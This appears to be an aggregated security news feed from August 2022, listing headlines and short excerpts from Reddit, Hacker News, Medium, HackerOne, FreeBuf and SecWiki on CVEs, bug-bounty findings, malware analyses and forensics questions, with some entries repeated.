    Before I start this I want to preface that I am genuinely curious and not trying to start a argument over programming languages and what not but why do you all want do exploit development? As far as I understand it (which is possibly incorrect) developing exploits are starting to become a thing of the past with much more "safe" languages and mitigations being implemented and software becoming much more safe. Now this may be a scathing hot take but is there a bit of truth to it? I like the idea of Exploit Dev and I would love to know what you guys opinions/why you do what you do. I want to get into Exploit Dev but I don't think as a career but as a cool hobby that would be cool to talk about. ​ Thanks for reading submitted by /u/Synosis1 [link] [comments]
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814 Points: 4 # Comments: 0
    CVE-2022-29154 – rsync exploit
    Article URL: https://docs.ssh-mitm.at/CVE-2022-29154.html Comments URL: https://news.ycombinator.com/item?id=32353570 Points: 2 # Comments: 0
  • Open

    CVE-2022-29582 – An io_uring vulnerability
    Article URL: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/ Comments URL: https://news.ycombinator.com/item?id=32359814 Points: 4 # Comments: 0
    High-impact vulnerability in DrayTek routers leaves thousands of SMEs open to
    Article URL: https://portswigger.net/daily-swig/high-impact-vulnerability-in-draytek-routers-leaves-thousands-of-smes-open-to-exploitation Comments URL: https://news.ycombinator.com/item?id=32356636 Points: 1 # Comments: 0
    Slack Serious Vulnerability: Invite Link Function
    Just received this in my inbox: We are writing to let you know about a bug we recently discovered and fixed in Slack's Shared Invite Link functionality. This feature allows you to create a link that will permit anyone to join your Slack workspace; it is an alternative to inviting people one-by-one via email to become workspace members. You are receiving this email because you created and/or revoked one of these links for your workspace between April 17, 2017 and July 17, 2022. We'll go into detail about this security issue below. Important things first, though: We have no reason to believe that anyone was able to obtain your plaintext password because of this vulnerability. However, for the sake of caution, we have reset your Slack password. You will need to set a new Slack password before…
  • Open

    War in Ukraine / August 4
    Day 163: The Kharkiv direction is another difficult point for the Russian Federation Continue reading on Medium »
    An Interview with a Private Investigator and OSINT master
    Chatting with OhShINT Continue reading on Medium »
  • Open

    SecWiki News 2022-08-05 Review
    攻防演练第四年的一些碎碎念 by ourren MSF多层内网渗透全过程 by ourren 数据传输安全白皮书 by ourren 美国关键基础设施网络防御路线发展与调整 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-05 Review
    攻防演练第四年的一些碎碎念 by ourren MSF多层内网渗透全过程 by ourren 数据传输安全白皮书 by ourren 美国关键基础设施网络防御路线发展与调整 by ourren 更多最新文章,请访问SecWiki
  • Open

    How do you analyze a possible "drive by" download incident?
    Or is it something else entirely? [Paraphrasing here] I received a panicked call from a friend the other day. Intending to go to fivethirtyeight.com, she'd instead typed in .org. This took her to a page (safety-search dot com) that was prompting her to download their "yahoo team developed" browser plugin to help her with safe searches. She didn't click on anything and, when she got back to her screen with phone in hand, her browser had gone to fivethirtyeight.com. There were no malware protection software notifications of any kind anywhere in the process. Did something already happen by then, even if she didn't click on anything? What's the best way to look at this type of incident to figure out what might or might not have happened? submitted by /u/arnach [link] [comments]
  • Open

    How to analyze Linux malware – A case study of Symbiote
    https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/ submitted by /u/CyberMasterV [link] [comments]
    Linux Forensics Scenario
    Good morning /r/computerforensics I've got a hypothetical scenario I'd like to run by you - I've got a Ubuntu VM. Suppose I create a partition, write files to that partition, and then delete the partition. How would I image the VM to obtain the disk slack that contained that partition? Do VMs even contain disk slack? How about if I have partition sda, sdb, and sdc, aside from the naming convention, if I deleted sdb, any tips on identifying that there was once sdb (using a tool like sleuthkit)? Thank you for your time and mental cycles :) submitted by /u/DeadBirdRugby [link] [comments]
    Remote Forensic Imaging
    Hello everyone! I've to create a forensics image from a dedicated server hosted on OVH. Any suggest? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    APT32组织针对我国关基单位攻击活动分析
    APT32海莲花组织作为有国家背景支持的顶尖黑客团伙。
    FreeBuf早报 | 阿里巴巴称互联公司正减缓云支出;远程木马Woody瞄准俄罗斯实体
    在阿里巴巴2022 Q2财报电话会议上,高管们谈到了“互联网行业减速”,这阻碍了阿里云的增长。
    谨防勒索病毒对工控网络的危害
    勒索病毒,是一种新型电脑病毒,主要以邮件、程序木马、网页挂马的形式进行传播。该病毒性质恶劣、危害极大,一旦感染将给用户带来无法估量的损失。
    柬埔寨数据合规重点解读
    近年来,柬埔寨非常重视数字经济发展,颁布了《电子商务法》,并将外国电商企业纳入简化增值税登记机制。
    新型Linux僵尸网络RapperBot暴力破解SSH服务器
    研究人员发现了一种新型物联网(IoT)僵尸网络“RapperBot”,自2022年6月中旬以来就一直处于活动状态。
    FreeBuf周报 | 澳大利亚隐私监管机构调查TikTok;印度废除数据保护法;区块链行业遭供应链攻击重创
    澳大利亚隐私监管机构正调查 TikTok,TikTok 称报告存在多处错误,并“存在对移动应用根本性的误解”。
    【深度】OpenSea 新协议 Seaport源码解析
    近期,NFT 市场 OpenSea 宣布推出全新 Web3 市场协议 Seaport 协议,用于安全高效地买卖 NFT。本文将深度分析其关键业务实现和接口实现。
    记一次非法网站渗透
    本篇文章原文在我的个人公众号(ZAC安全)中,部分有争议的内容已修改。
    印度政府宣布撤回本国数据保护法案
    8月3日,印度电子和信息技术国务部长Rajeev Chandrasekhar宣布,于2019年颁布的《数据保护法案》已正式撤回。
    过去一年里,游戏行业的网络攻击爆增167%
    网络安全公司Akamai发布了最新的报告。
    DrayTek爆出RCE漏洞,影响旗下29个型号的路由器
    研究人员发现一个严重的远程代码执行漏洞,会对29种型号的DrayTek Vigor商业路由器产生严重影响。
    德国工商总会被网络攻击打爆了
    网络攻击组织盯上了 DIHK,对其发起了大规模的网络攻击。DIHK无力面对如此强力的网络攻击,直接躺平。
    Solana被盗500万美元,具体原因尚不明确
    攻击者从区块链平台Solana窃取了超过500万美元,具体的失窃原因仍在进一步调查中调查中。
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview
  • Open

    Let’s Learn API Security: More about Broken Object Level Authorization
    Introduction Continue reading on InfoSec Write-ups »
    What do we learn from modern Cyber Warfare & State Sponsored Threats (SCADA & ICS)
    No content preview
    HTB — Dirty Money — Debugger Unchained Write Up
    No content preview
    Malware Traffic Analysis Exercise | Burnincandle | IcedID Malware
    No content preview

  • Open

    Elastic Open Sources Their Endpoint Security Protection YARA Ruleset
    submitted by /u/sanitybit [link] [comments]
    Azure Threat Research Matrix
    submitted by /u/sanitybit [link] [comments]
    HyperDbg: Reinventing Hardware-Assisted Debugging
    submitted by /u/sanitybit [link] [comments]
    Sharpening Your Tools: Updating bulk_extractor for the 2020s
    submitted by /u/sanitybit [link] [comments]
    Cloudflare Implements Experimental Support for Post-Quantum Cryptography
    submitted by /u/sanitybit [link] [comments]
    Exploring the SameSite cookie attribute for preventing CSRF!
    submitted by /u/macropng [link] [comments]
    How To Implement JSON Web Token (JWT) in Java Spring Boot
    submitted by /u/sanitybit [link] [comments]
    Certipy 4.0: ESC9 & ESC10, BloodHound GUI, New Authentication and Request Methods — and more!
    submitted by /u/ly4k_ [link] [comments]
    QNAP Poisoned XML Command Injection (Silently Patched)
    submitted by /u/chicksdigthelongrun [link] [comments]
    Tool that automates the tedious process of searching leaks through format string vulnerabilities. It will allow you to find stack leaks, pie leaks and canary leaks, in each case indicating the payload that provides the leak.
    submitted by /u/Diego-AltF4 [link] [comments]
    Building did someone clone me: a free service that notifies its users when their website is cloned and used in a phishing attack
    submitted by /u/wez32 [link] [comments]
    Risky Business: Determining Malicious Probabilities Through ASNs
    submitted by /u/sanitybit [link] [comments]
    PersistenceSniper: Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines by @last0x00
    submitted by /u/last0x00 [link] [comments]
    Paranoid project checks for well known weaknesses on cryptographic artifacts such as public keys, digital signatures and general pseudorandom numbers
    submitted by /u/Gallus [link] [comments]
  • Open

    Server Side Template Injection-Something Distinct!
    How’s it going guys! My name is Sagar Sajeev and this is my writeup about one of my recent SSTI (Server Side Template Injection) finding. Continue reading on Medium »
    Finding internal ip for big organization
    I have found a way to find internal ip for big organization(for example twitter, linkedin etc).The way to do that is very simple. Continue reading on Medium »
    The Instacart Bug Bounty Program - How We Work with White Hat Hackers to Secure Instacart
    Authors: James Cha, Vickie Li, Shashank Mirji, and Frank Filho Continue reading on tech-at-instacart »
    Authentication Bypass
    When performing a penetration test of an application, tests against the authentication mechanism are always an important check. While a… Continue reading on Medium »
    DBMS Detection Of Sql Injection
    In this article, we will learn about DBMS Injection. Continue reading on Medium »
    Protection Strategies Sql Injection
    SQL injections are one of the most utilized web attack vectors used with the goal of retrieving sensitive data from organizations. Continue reading on Medium »
    Finding SQL Injection Manually
    SQL injection is a code injection technique used to hack websites, attack data applications, destroy databases by inserting malicious SQL… Continue reading on Medium »
    SS7 Practical Video From Pentester Club
    Signaling System 7 (SS7) is an architecture for performing out-of-band signaling in support of the call-establishment, billing, routing… Continue reading on Medium »
    what is footprinting in hacking || types of footprinting || Pentester Club
    Footprinting is an ethical hacking technique used to gather as much data as possible about a specific targeted computer system, an… Continue reading on Medium »
  • Open

    “Liberators” vs “Occupiers”: the importance of subtle propaganda
    I defend Lakoff’s idea that propaganda is about how one frames an issue by looking at media coverage of the Russian invasion of Ukraine. Continue reading on Medium »
    How To Track An Individual On Social Media Using OSINT — Part 3.2
    Hiillo Folks! I hope you liked my OSINT series. In this blog, we will discuss some professionals and undercover techniques to track anyone… Continue reading on Medium »
    War in Ukraine / August 3
    Day 162: Mykolaiv will not be forcibly evacuated Continue reading on Medium »
    Orwell is here now. He’s livin’ large.
    Well.. let's start this story back at the beginning! I am not a hacker but Angelina Jolie circa ’95 was my first love and I have seen the… Continue reading on Medium »
  • Open

    Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability
    Reddit disclosed a bug submitted by high_ping_ninja: https://hackerone.com/reports/1658418 - Bounty: $5000
    Unauthenticated Private Messages DIsclosure via wordpress Rest API
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1590237 - Bounty: $350
    Sensei LMS IDOR to send message
    Automattic disclosed a bug submitted by ghimire_veshraj: https://hackerone.com/reports/1592596 - Bounty: $100
    Unrestricted File Upload Blind Stored Xss in subdomain ads.tiktok.com
    TikTok disclosed a bug submitted by mrzheev: https://hackerone.com/reports/1577370 - Bounty: $250
  • Open

    Is there any getting around Deep Freeze?
    Has anyone encountered Deep Freeze, and know if there's a way around its "reboot to restore" ability? submitted by /u/greyyit [link] [comments]
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Analyzing a Remcos RAT Infection
    No content preview
    A Multi-Layered Security Architecture for Databases
    No content preview
    Intro to Digital Forensics
    No content preview
    This is how he could hijack Reddit accounts with just ONE click: a $10,000 bug bounty
    Exploring Frans Rosén’s bypass of OAuth security Continue reading on InfoSec Write-ups »
  • Open

    Why is there such a big difference in company response time to vulnerabilities?
    I know that each company has different procedures and practices, but as a student to cybersecurity, I'm struggling to understand why some large companies struggle to patch vulnerabilities while others can with ease. To illustrate this example, We'll look at CVE-2022-0778 (Publicized March 15th, 2022). An OpenSSL vulnerability that was in a bug on the BN_mod_sqrt() function, if served as a maliciously crafted cert to parse, it would enter an infinite loop. The vulnerability then impacts a bunch of different scenarios such as Denial of Service, TLS servers consuming client certs, TLS servers consuming client certs, taking private keys from customers, etc. Looking through the vulnerability reports and responses, I saw that each cybersec company responded to the vulnerability differently. Some were able to patch it fast, while others still haven't come up with a fix For instance, PAN deployed a patch 39 days after the publication, Check Point deployed one in 2-3 days, but companies like Fortinet + Cisco still haven't announced a patch yet. My main question is if it's considered "High Severity", then why would some companies still not have it patched? Thanks. submitted by /u/Beginning_Actuary_54 [link] [comments]
    Missing Firmware Files
    I am attempting to install AlienVault OSSIM on a new server but I can not get past this error. I can not find this bin file online. Would anyone be able to link to to a place that I can download this firmware file? submitted by /u/SOSicearrow [link] [comments]
    Drive-By-Downloads: How does malware "leave" the browser to attack the OS, software, etc?
    How is malware that was delivered to you via the browser able to exploit things like the OS or other software on the computer? In other words, how does malware "travel" outside of the browser to exploit other things on the computer? submitted by /u/Jaruki_Jurakami [link] [comments]
  • Open

    SecWiki News 2022-08-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-04 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    HackTheBox — Explosion
    Explosion is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    OXDR-Red Team
    The Litmus Test of your Cybersecurity also helps to achieve a continuous Cybersecurity posture.  Redops and Cart  Vulnerability Management… Continue reading on Medium »
  • Open

    深入学习 Java 反序列化之 JNDI 运行逻辑
    深入学习 JNDI 注入的漏洞原理以及背后逻辑。
    区块链行业遭供应链攻击,上万加密钱包被“抄底”损失上亿美元
    据科技媒体TechCrunch报道,若干名未知攻击者“抄底”了上万个加密钱包,钱包内有价值上亿美元的代币。
    FreeBuf早报 | 澳大利亚监管机构调查 TikTok;GitLab 删除免费账户中的休眠项目
    澳大利亚隐私监管机构 表态,正在遵循监管行动政策,核查一份报告中指出的 TikTok 数据隐私问题。
    FreeBuf早报 | 澳大利亚隐私监管机构调查 TikTok;GitLab 计划删除免费账户中的休眠项目
    澳大利亚隐私监管机构 表态,正在遵循监管行动政策,核查一份报告中指出的 TikTok 数据隐私问题。
    CVE-2022-26138 Confluence Server硬编码漏洞分析
    Atlassian发布7月的安全更新,涉及到Confluence Server的多个漏洞,其中CVE-2022-26138为一个硬编码漏洞。
    GitHub 3.5万个代码库被黑?谣言,只是被恶意复制
    虽然“GitHub 3.5万个代码库被攻击”是一个乌龙事件,但是有软件工程师发现,大约有数千个GitHub代码库正在被恶意复制。
    Atomic wallet遭山寨,假网站散播恶意软件
    知名去中心化钱包和加密货币交换门户网站Atomic wallet近期被假冒。
    针对微软企业电子邮件服务,大规模网络钓鱼攻击来袭
    来自ThreatLabz的安全研究人员发现了一批大规模的网络钓鱼活动。
    思科修复了VPN路由器中关键远程代码执行漏洞
    目前,思科已经发布了软件更新来解决这两个漏洞。
    微软推出新服务,扩大企业对其威胁情报库的访问权限
    微软已在本周推出两项新服务,让企业安全运营中心 (SOC) 更广泛地访问其每天收集的大量威胁情报。
    研发招聘实战:2个月招20人的Linux和C语言团队
    有一年初,急需扩充后台Linux C\C++研发团队,需在2个月内招聘到20人。在薪资不属于一流的情况下如何保证质量?
  • Open

    Comics, underground, European and mainstream
    https://booksdl.org/comics0/ submitted by /u/Forward_Hold5696 [link] [comments]
  • Open

    依靠 Windows Defender | LockBit 勒索软件通过 Microsoft 安全工具侧面加载 Cobalt Strike
    作者: Julio Dantas, James Haughom, Julien Reisdorffer 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    依靠 Windows Defender | LockBit 勒索软件通过 Microsoft 安全工具侧面加载 Cobalt Strike
    作者: Julio Dantas, James Haughom, Julien Reisdorffer 译者:知道创宇404实验室翻译组 原文链接:https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-s...
  • Open

    Need Help. Question about IP/Location
    I am not sure if this is the correct sub, if not, maybe some one can help direct me to the correct one. Basically some of my personal information was stolen and posted online. I used a fake tracking link to capture the IP and other user information of the person that was posting my information online. My main question is, is there any way that the IP could track back to a different state then where the person is actually located? Like if they bought their phone in one state and then moved, could it possibly still show the old state? submitted by /u/HumanUnidentified [link] [comments]

  • Open

    geopipe: filter by server location inside your pipe chain
    submitted by /u/lukahacksstuff [link] [comments]
    The Consequences of Inadequate Identity Management in your GitHub Organization
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]
    Hijacking email with Cloudflare Email Routing
    submitted by /u/jwizq [link] [comments]
    How to detect Brute Ratel C2 (beacons & server deployments)
    submitted by /u/gid0rah [link] [comments]
    EMBA Firmware analyzer version 1.1.0 aka Las Vegas Edt. is out now - a lot of new features including system emulation environment, status bar and Ubuntu support
    submitted by /u/_m-1-k-3_ [link] [comments]
  • Open

    Programming language(s) question
    Hi all, As you guys know I am going into digital forensics (specifically eDiscovery). My question for the day is, what programming language(s) do you guys suggest that I learn? Thank You. submitted by /u/swatteam23 [link] [comments]
    TCU Live: 2022AUG01 (latest release)
    The latest version of "TCU Live" (2022AUG01) has been released. It's running the latest Debian sid packages, Linux 5.18 kernel, and third party packages such as the Tor Browser, checkra1n, volatility, guestmount, git, etc. See the README in the link for more information: https://drive.google.com/drive/folders/0B8zx3qPcj9rJVjJrcnB4aXl1VG8?resourcekey=0-gjI_o4MHtiCvsjet9TCygw&usp=sharing It's built to be fairly lean and extensible and is great for in-house forensics, OSINT, field work, or if you just need to quickly spin up a Linux box. If you are looking for something that'll boot on almost all x86-64 (AMD64) hardware give it a shot and DM me if you have any comments or issues. submitted by /u/atdt0 [link] [comments]
  • Open

    ISP Stale Record Assignments
    A very large ISP had previously associated a number of their IP addresses to our company. What I mean by this is that a WHOIS/ARIN lookup for the IP has our company name referenced in it. These IP addresses are no longer in use by our company as confirmed by the ISP. The ISP is blaming DNS and telling us that it could take years for our company name to be disassociated with the IP. Why do I care? The IP addresses are negatively impacting our public footprint score utilized by regulatory agencies. Who can disassociate our company name from these IP addresses? Can't the owner of the IPs make this change since they own the IP addresses? What do I need to tell them to do? submitted by /u/mtx4gk [link] [comments]
    AlienVault Alarms - Rundll32
    Hi, I need some assistance with Alienvault OTX alarms that I've received recently. Commands are being ran on user's machines with their usernames (wouldn't this be "ran" as something else if it was an automated process?).They all have to do with:C:\Windows\System32\rundll32.exeC:\Windows\System32\svchost.exe ​ I will comment and condense the alarms down. The users whose machines it is occurring on are not computer fluent people and don't know what a command line is. I also can't find any info for the switches of the command line ( -k, -s, ). I'm having trouble figuring out if these are false positives. ​ NOTE: MD-5 hashes confirm as Microsoft on Virustotal submitted by /u/compguyguy [link] [comments]
    Bug bounty programs for Linux Kernel bugs and exploits
    Just curious what are the places willing to pay for Linux Kernel bugs and LPE exploits outside Google's kctf, ZDI's pwn2own, and zerodium? submitted by /u/AggravatingTell547 [link] [comments]
    How to exclude specific IP addresses from being monitored on Security Onion?
    Hello, In the global pillar on my manager node (/opt/so/saltstack/local/pillar/global.sls), I already specified my BPF to exclude the monitoring of whitelisted IP addresses as follows: nids: bpf: - not host 192.168.1.2 && - not host 192.168.1.3 && - not host 192.168.1.4 However, the alerts still triggered from the above IP addresses. I think that the AND operators should be replaced by OR? Any advice would be highly appreciated. Thank you. submitted by /u/sanba06c [link] [comments]
  • Open

    Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware
    We provide a case study of how the criminal group Projector Libra uses legitimate file sharing services to distribute Bumblebee malware. The post Flight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware appeared first on Unit 42.
  • Open

    War in Ukraine / August 2
    Day 161: HIMARS in action — the Russian Federation failed to destroy any of the systems delivered to Ukraine Continue reading on Medium »
  • Open

    [Bugbounty]Blind XSS via header injection to log poisoning
    Olá, espero que você esteja bem e caçando! Continue reading on Medium »
    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team! Continue reading on Medium »
    You need these certifications *RIGHT NOW*
    Hello guys, I’m Abhishek, today I'm with a new topic. Yes, you heard it right that You need these certifications in 2022 right now. Every… Continue reading on Medium »
    Wanna start your Journey in Web3 Cybersecurity or Bug Bounties?
    Here’s the list of Websites to look upon. Continue reading on Medium »
    How to get started into Bug Bounty?
    COMPLETE BEGINEER’S GUIDE IN 7 STEPS… Continue reading on Medium »
    Elasticsearch A Easy Win For Bug Bounty Hunters || How To Find and Report
    Assalamu Alaikum peace be upon you Continue reading on Medium »
    5 must-have books for bug hunters (Part 1)
    Hello guys, I’m back with another exciting topic. We all need guidance in bug hunting, through our mentors, professional bug hunters, and… Continue reading on Medium »
    When an IDOR becomes EVIL > Total Data Leak​
    Hi fellow hackers and friends, This is Aravind here with another awesome article on how an IDOR bug helped me to access all user data of a… Continue reading on Medium »
    Rate Limiting Bypass
    Hello folks, Continue reading on Medium »
    Open Redirect and information gathering before find that vulnerability
    In this tutorial, Im just wanna talk about open redirect vulnerability and explain how hacker do information gathering to find that… Continue reading on Medium »
  • Open

    [Bugbounty]Blind XSS via header injection to log poisoning
    Olá, espero que você esteja bem e caçando! Continue reading on Medium »
  • Open

    Subdomain Takeover Tool
    dnsReaper — subdomain takeover tool for attackers, bug bounty hunters and the blue team! Continue reading on Medium »
    Attacktive Directory
    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on System Weakness »
    Attacktive Directory
    ACTIVE DIRECTORY ROOM FROM TRY HACK ME Continue reading on Medium »
    HackTheBox — Redeemer
    Redeemer is a boot2root machine on HackTheBox. It has “Very Easy” difficulty and is part of Tier 0 starting point challenges. Continue reading on Medium »
    How To Detect Remote Desktop Protocol tunneling over SSH
    During some testing on my Windows VPS, I was checking out the OpenSSH server feature in Windows. This reminded me about the times our Red… Continue reading on Medium »
    SOCFortress Attack Simulator
    Using Caldera to test your EDR Agent Continue reading on Medium »
  • Open

    SecWiki News 2022-08-03 Review
    2022 上半年区块链安全及反洗钱分析报告 by ourren 从0-1搭建企业级数据治理体系 by ourren 国际网络攻击溯源机制的必要性和可行性探析 by ourren 云计算安全的新阶段:云上风险发现与治理 by ourren 浅析Vmess流量与强网杯2022谍影重重 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-03 Review
    2022 上半年区块链安全及反洗钱分析报告 by ourren 从0-1搭建企业级数据治理体系 by ourren 国际网络攻击溯源机制的必要性和可行性探析 by ourren 云计算安全的新阶段:云上风险发现与治理 by ourren 浅析Vmess流量与强网杯2022谍影重重 by ourren 更多最新文章,请访问SecWiki
  • Open

    XSS in redditmedia.com can compromise data of reddit.com
    Reddit disclosed a bug submitted by keer0k: https://hackerone.com/reports/862882
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    Cyber Security Detection Frameworks
    No content preview
    Abusing URL Shortners for fun and profit
    Hello Security Researchers Continue reading on InfoSec Write-ups »
    Multiple bugs in one program leads to 1500€
    No content preview
    IW Weekly #14: $1M bounty, bug bounty tips, upcoming CTF events, API attacks, bypassing .NET,
    No content preview
  • Open

    FreeBuf早报 | 德半导体制造商遭勒索软件攻击;微软宣布新的外部攻击面审计工具
    德国电力电子制造商赛米控披露,它遭到勒索软件攻击,甚至加密了公司的网络。
    恶意软件是如何伪装的,这份报告给出了答案
    恶意软件设计和部署的关键之处,在于将自己伪装成合法的APP,欺骗用户用户下载和运行恶意文件,以此感染目标设备和系统。
    知名半导体制造商Semikron遭勒索软件攻击
    德国半导体制造商Semikron披露,该公司遭到勒索软件攻击,加密了公司的部分网络。
  • Open

    PART 3: How I Met Your Beacon - Brute Ratel - @MDSecLabs
    submitted by /u/dmchell [link] [comments]

  • Open

    Creating Processes Using System Calls
    submitted by /u/sanitybit [link] [comments]
    Using process creation properties to catch evasion techniques
    submitted by /u/sanitybit [link] [comments]
    NIST SIKE finalist for quantum safe crypto has been broken by a very efficient classical computer attack.
    submitted by /u/ScottContini [link] [comments]
    All your PTY/TTY belongs to us
    submitted by /u/Background-Degree-50 [link] [comments]
  • Open

    Vulnerability management policies considered harmful to shipping secure software
    Article URL: https://haydock.substack.com/p/security-release-criteria Comments URL: https://news.ycombinator.com/item?id=32324806 Points: 3 # Comments: 0
    Hacker Probably Targeting Auth Option Update Vulnerability in Make's WP Plugin
    Article URL: https://www.pluginvulnerabilities.com/2022/08/02/hacker-probably-targeting-this-authenticated-option-update-vulnerability-in-makes-wordpress-plugin/ Comments URL: https://news.ycombinator.com/item?id=32322219 Points: 1 # Comments: 0
    Rsync client-side arbitrary file write vulnerability
    Article URL: https://www.openwall.com/lists/oss-security/2022/08/02/1 Comments URL: https://news.ycombinator.com/item?id=32318155 Points: 128 # Comments: 36
  • Open

    Web Cache Poisoning Via uma Entrada sem Chave
    Olá sou o SNISS e hoje vou falar sobre uma vulnerabilidade muito encontrada recentemente chamada de Envenenamento de web Cache Continue reading on Medium »
    Monthly Update: July 2022
    Dear community. Continue reading on Medium »
    Stored XSS to Account Takeover : Going beyond document.cookie
    Stealing Session Information From IndexedDB Continue reading on Medium »
    How I cleared(hacked) all my traffic cases with just ₹100- BugBounty [BangaloreTrafficPolice]
    Note:- It's just a bug report to the Paytm and BangaloreTrafficPolice, KarnatakaOne websites, with 5-star severity, hope they fix nothing… Continue reading on Medium »
    Why Every Organization Should have a Bug Bounty Program
    Introduction Continue reading on Medium »
    Equipe Moonbeam lança patch de segurança urgente para bug de truncamento de números inteiros
    Na segunda-feira, 27 de junho de 2022, Moonriver e Moonbeam receberam uma atualização urgente por meio do runtime 1606 para resolver um… Continue reading on Medium »
    Multiple bugs in one program leads to 1500€
    Hi, today I‘m going to talk about three basic vulnerabilities that I discovered in the same program and were rewarded with 1500€. Continue reading on InfoSec Write-ups »
    How I earned 500$ by uploading a file: write-up of one of my first bug bounty
    This is the write-up of one of the first vulnerabilities that I found 3 years ago. It’s a little late, but better late than never, right? Continue reading on Medium »
    KLEX FINANCE TESTNET QUICK GUIDE
    KLEX is an implementation of the Balancer v2 Protocol on Klaytn. Continue reading on Medium »
  • Open

    [WriteUp] OhSINT — TryHackMe
    Begginer friendly OSINT room to sharp your skills Continue reading on Medium »
    Threat Intelligence Tools — TryHackme Walkthrough
    Explore different OSINT tools used to conduct security threat assessments and investigations. Continue reading on Medium »
    War in Ukraine / August 1
    Day 160: An important moment for the Ukrainian counteroffensive Continue reading on Medium »
    Is OSINT legal or ethical?
    In the US and the UK, OSINT is legal, but security teams need to stay within a clearly defined framework, which is agreed with their… Continue reading on Medium »
  • Open

    Can kernel debugging be done between different processor architectures?
    Sorry if this sounds like a noob question. ​ When it comes to Kernel Debugging, HackSys Team's HEVD seems to be the go-to for practice. In write-ups, we see that we need to set up 2 VMs and set up baud rate, etc. Essentially, trying to replicate the hard-wired debugging across machines with Ethernet cables that was performed before VMs came along. The baud rate is matched between windbg running on both VMs and a Pipe is set up between both VMs. ​ Can this be done between different processor architectures? Ex: I have Win10 VM on a x86_64 arch machine (Debuggee) and another Win10 VM on MacBook Pro (Debugger). Since MacBook uses ARM arch, the debugger will obviously show ARM instructions (if I were to debug an application that's already on MacBook). Now, is there a way I can debug the x86_64 programs on Debuggee VM from my ARM VM? ​ If I'm not making sense, let me know. I'm pretty new to this and I'm trying to learn. submitted by /u/ScrotumHair [link] [comments]
  • Open

    DFIR career trajectory and goals - what would you do differently if you could go back in time?
    I’m new to the DFIR field, and I’m wondering what some of you, that have been in the field for years, would do if you could go back in time? What are some things to think about or consider as you go forward in your career? I’m young and inexperienced, so it’d be cool to hear about any tips, or advice you might have for a new comer in this field submitted by /u/tfulab23 [link] [comments]
  • Open

    SecWiki News 2022-08-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-02 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    One-click account hijack for anyone using Apple sign-in with Reddit, due to response-type switch + leaking href to XSS on www.redditmedia.com
    Reddit disclosed a bug submitted by fransrosen: https://hackerone.com/reports/1567186 - Bounty: $10000
    Found Origin IP's lead to access to gitlab
    GitLab disclosed a bug submitted by m-narayanan: https://hackerone.com/reports/1637577
  • Open

    零信任安全论坛精选议题视频上线 | CIS大会夏日版
    CIS大会夏日版,FreeBuf邀请多位业界大咖,就零信任安全进行了深入的探讨、展望,期待能够给企业和用户带来一些零信任安全方面的参考和启发。
    FreeBuf早报 | 专家称推特泄密情况很糟糕;QQ音乐开始显示用户IP属地信息
    540 万 Twitter 用户的数据在暗网上出售的消息可能会让许多人感到震惊,但这可能只是冰山一角。
    火了十几年的零信任,为啥还不能落地
    对于甲方企业来说,全面实施零信任的核心推动是什么,零信任技术未来的发展路径又是怎样的呢?
